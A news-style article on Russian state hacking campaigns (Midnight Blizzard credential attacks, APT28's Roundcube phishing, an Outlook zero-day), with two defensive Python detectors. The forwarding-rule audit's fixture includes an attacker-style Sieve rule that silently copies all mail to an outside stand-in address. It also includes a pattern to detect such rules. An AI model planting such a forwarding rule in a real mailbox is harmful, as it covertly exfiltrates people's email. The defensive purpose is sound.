Microsoft has recently revealed a significant spike in credential-stealing attacks orchestrated by Midnight Blizzard, a Russian state-affiliated hacker group.
These intrusions, which routed traffic through residential proxy services to hide the true source IP addresses, targeted governments, IT service providers, NGOs, defense establishments, and critical manufacturing sectors. Midnight Blizzard, also tracked as Nobelium, APT29, Cozy Bear, Iron Hemlock, and The Dukes, is attributed to Russia's foreign intelligence service.
Despite the exposure that followed the SolarWinds supply chain compromise, the group continues to use covert techniques to infiltrate foreign ministries and diplomatic entities, and remains one of the most capable espionage actors in the field.
Unseen Tooling and Unyielding Operations
Midnight Blizzard's ability to keep operating while evading detection rests in part on tooling that has not been publicly documented. Microsoft, in a series of tweets, explained that the credential attacks combine several techniques: password spraying, brute-force attacks, and token theft.
The group also used session replay attacks to gain initial access to cloud resources, presenting stolen sessions that were likely acquired through illicit sale. Residential proxy services helped it blend malicious traffic into ordinary consumer address space and hide the connections made with compromised credentials. Because these proxy IPs have low reputation and rotate quickly, IP-based blocking and scoping are unreliable: defenders have to pivot on other attributes, such as the client string used across many accounts, the session identifier reused from a new network, or the timing of attempts, to establish the true scope of an intrusion and remediate it.
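Two detections that follow from the passage above, written as an added example rather than code from Microsoft: a password spray that arrives from a different residential-proxy IP for every account, so that per-IP lockouts never trigger, and a stolen session token presented again from a new network. The sign-in records, their field names (`ts`, `user`, `ip`, `asn`, `ua`, `result`, `session`) and the threshold values are all constructed for illustration and would need tuning against real telemetry.

```python
"""Two detections for the credential attacks described above: a password
spray routed through rotating residential-proxy IPs, and replay of a stolen
session token from a new network. Added example, not Microsoft's code; the
sign-in records and their field names are constructed for illustration."""
from collections import defaultdict
from datetime import datetime, timedelta


def ev(ts, user, ip, asn, ua, result, session=None):
    """Build one constructed sign-in record (field names are assumptions)."""
    return {"ts": ts, "user": user, "ip": ip, "asn": asn, "ua": ua,
            "result": result, "session": session}


SPRAY_UA = "python-requests/2.28"
EVENTS = [
    # Spray: one failed password per account, every attempt from a different
    # residential-looking IP and ASN, but the same non-browser client string.
    ev("2023-06-01T10:00:01", "alice", "203.0.113.10", 64496, SPRAY_UA, "failure"),
    ev("2023-06-01T10:00:47", "bob", "198.51.100.23", 64497, SPRAY_UA, "failure"),
    ev("2023-06-01T10:01:30", "carol", "192.0.2.77", 64498, SPRAY_UA, "failure"),
    ev("2023-06-01T10:02:12", "dave", "203.0.113.201", 64499, SPRAY_UA, "failure"),
    ev("2023-06-01T10:03:05", "erin", "198.51.100.140", 64500, SPRAY_UA, "failure"),
    ev("2023-06-01T10:04:40", "frank", "192.0.2.9", 64501, SPRAY_UA, "failure"),
    # Benign: one user mistyping a password three times from one IP.
    ev("2023-06-01T10:10:00", "grace", "192.0.2.5", 64502, "Outlook/16.0", "failure"),
    ev("2023-06-01T10:10:20", "grace", "192.0.2.5", 64502, "Outlook/16.0", "failure"),
    ev("2023-06-01T10:10:45", "grace", "192.0.2.5", 64502, "Outlook/16.0", "failure"),
    ev("2023-06-01T10:11:10", "grace", "192.0.2.5", 64502, "Outlook/16.0", "success", "s-grace-1"),
    # A session issued to carol on her usual network, then presented again
    # half an hour later from a proxy in a different ASN: no password involved.
    ev("2023-06-01T11:00:00", "carol", "198.51.100.7", 64502, "Mozilla/5.0 (Windows NT 10.0)", "success", "s-carol-1"),
    ev("2023-06-01T11:30:00", "carol", "203.0.113.55", 64503, "Mozilla/5.0 (Windows NT 10.0)", "success", "s-carol-1"),
]


def _t(e):
    return datetime.fromisoformat(e["ts"])


def detect_password_spray(events, window=timedelta(minutes=10),
                          min_users=5, max_per_user=2, min_ips=3):
    """Flag a client string that fails against many accounts, a few tries
    each, from many source IPs inside one window. Pivoting on the client
    string rather than the source IP is what survives proxy rotation; a
    per-IP lockout never sees more than one or two attempts per address."""
    by_ua = defaultdict(list)
    for e in sorted(events, key=_t):
        if e["result"] == "failure":
            by_ua[e["ua"]].append(e)
    findings = []
    for ua, evs in by_ua.items():
        for i, start in enumerate(evs):          # sliding window per client string
            win = [x for x in evs[i:] if _t(x) - _t(start) <= window]
            per_user = defaultdict(int)
            for x in win:
                per_user[x["user"]] += 1
            ips = {x["ip"] for x in win}
            if (len(per_user) >= min_users and max(per_user.values()) <= max_per_user
                    and len(ips) >= min_ips):
                findings.append({"ua": ua, "start": start["ts"],
                                 "users": sorted(per_user), "ips": len(ips)})
                break                             # one finding per client string
    return findings


def detect_session_replay(events):
    """Flag a session identifier presented from a different ASN than the one
    it was issued to. A stolen cookie or token needs no password, so the
    spray logic above never sees it; the session id is the only pivot."""
    origin, findings = {}, []
    for e in sorted(events, key=_t):
        sid = e["session"]
        if not sid or e["result"] != "success":
            continue
        first = origin.setdefault(sid, e)
        if first is not e and e["asn"] != first["asn"]:
            findings.append({"session": sid, "user": e["user"], "ts": e["ts"],
                             "issued_from": first["ip"], "replayed_from": e["ip"]})
    return findings


if __name__ == "__main__":
    for f in detect_password_spray(EVENTS) + detect_session_replay(EVENTS):
        print(f)
```

The spray rule deliberately ignores the source address and groups on the client string, because with a residential proxy pool every attempt can come from a fresh IP. The replay rule compares autonomous systems rather than raw IPs so that a legitimate user moving between addresses on the same carrier is not flagged; mobile users who roam across carriers will still produce false positives, so in practice the ASN check is combined with device or location signals before it is allowed to revoke a session.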
New Spear-Phishing Campaign by APT28
Recorded Future, a cybersecurity company, recently uncovered a spear-phishing campaign orchestrated by APT28, also known as BlueDelta, Forest Blizzard, FROZENLAKE, Iron Twilight, and Fancy Bear.
This campaign primarily targeted government and military entities in Ukraine since November 2021.
The attacks used emails whose content exploited multiple vulnerabilities in the open-source Roundcube webmail software. Once the exploit ran in the victim's webmail session, the Russian military intelligence hackers deployed malicious JavaScript that forwarded the target's incoming email to an address under their control and exfiltrated contact lists. Because the forwarding is configured inside the mailbox rather than on the endpoint, it survives password changes and reimaging; auditing server-side filter rules for external forwards is the check that catches it.
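An audit for the persistence described above, added here as an example and not code from Recorded Future or the Roundcube project. It assumes the attacker's forwarding rule ends up in each user's Sieve filter script (Roundcube writes filters through its managesieve plugin); the scripts below are constructed, and in a real audit each would be fetched per mailbox from the managesieve server. The organisation domain `example.gov.ua` is an assumption.

```python
"""Audit of webmail forwarding rules, the persistence the campaign above
established after exploiting Roundcube. Added example, not Recorded Future's
or Roundcube's code. It assumes the forwarding rule lands in each user's
Sieve filter script (as Roundcube's managesieve plugin writes them); the
scripts below are constructed and would normally be fetched per user from
the managesieve server."""
import re

ORG_DOMAIN = "example.gov.ua"   # assumed organisation domain

# Constructed Sieve scripts, one per mailbox.
SCRIPTS = {
    "user1": ('require ["fileinto"];\n'
              'if header :contains "subject" "newsletter" {\n'
              '  fileinto "Lists";\n}\n'),
    # Attacker-style rule: silently copy every incoming message off-site.
    "user2": ('require ["copy"];\n'
              'redirect :copy "collector@mail.example.net";\n'),
    # Legitimate delegation inside the organisation.
    "user3": ('if address :is "from" "boss@example.gov.ua" {\n'
              '  redirect "assistant@example.gov.ua";\n}\n'),
}

# redirect, optional tags such as :copy, then the quoted target address.
REDIRECT_RE = re.compile(r'\bredirect\b((?:\s+:\w+)*)\s+"([^"]+)"', re.IGNORECASE)


def _is_internal(address, org_domain):
    domain = address.rsplit("@", 1)[-1].lower()
    return domain == org_domain or domain.endswith("." + org_domain)


def external_redirects(script, org_domain=ORG_DOMAIN):
    """Return every redirect in a Sieve script whose target is outside the
    organisation. 'unconditional' means the action sits outside any if-block,
    i.e. the whole mailbox is forwarded (brace counting is naive: it ignores
    braces inside strings, which is acceptable for an audit pass)."""
    findings = []
    for m in REDIRECT_RE.finditer(script):
        tags, target = m.group(1).lower(), m.group(2)
        if _is_internal(target, org_domain):
            continue
        before = script[:m.start()]
        findings.append({"target": target,
                         "copy": ":copy" in tags,
                         "unconditional": before.count("{") == before.count("}")})
    return findings


def audit(scripts, org_domain=ORG_DOMAIN):
    """Map each user to the external forwards found in their script."""
    return {user: hits for user, s in scripts.items()
            if (hits := external_redirects(s, org_domain))}


if __name__ == "__main__":
    for user, hits in audit(SCRIPTS).items():
        for h in hits:
            print(user, h)
```

The `:copy` tag is the detail worth watching: it forwards a copy while leaving the original in the inbox, so the victim notices nothing. An unconditional external redirect with `:copy` set is the signature of mailbox exfiltration rather than of a user delegating their mail, and is the combination to alert on first.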
The campaign demonstrated thorough planning, effectively weaponizing news content as bait, with subject lines and content mirroring legitimate media sources, all focused on Ukraine-related themes.
Unveiling the Russian Cyberwarfare Operations
The recent discoveries regarding Midnight Blizzard and APT28 coincide with another set of attacks that exploited a zero-day flaw in Microsoft Outlook (CVE-2023-23397).
Microsoft disclosed the vulnerability, which Russia-based threat actors had exploited in limited targeted attacks against European organizations, and addressed the elevation-of-privilege flaw in the Patch Tuesday updates of March 2023.
These findings highlight the relentless efforts of Russian threat actors in gathering valuable intelligence across Europe, particularly after the full-scale invasion of Ukraine in February 2022.
The cyberwarfare operations against Ukrainian entities have been marked by the widespread deployment of wiper malware built to erase and destroy data, making the conflict one of the earliest instances of large-scale hybrid warfare.
Conclusion
With the disclosure of Midnight Blizzard’s escalating credential-stealing attacks and APT28’s spear-phishing campaign, Microsoft and Recorded Future shed light on the persistent threat posed by Russian hackers.
The ability of these threat actors to adapt, utilize covert techniques, and exploit vulnerabilities showcases their unwavering determination in conducting espionage activities.
As the international community faces evolving cyber threats, robust defenses and proactive measures are imperative to safeguard governments, organizations, and critical infrastructure from these formidable adversaries.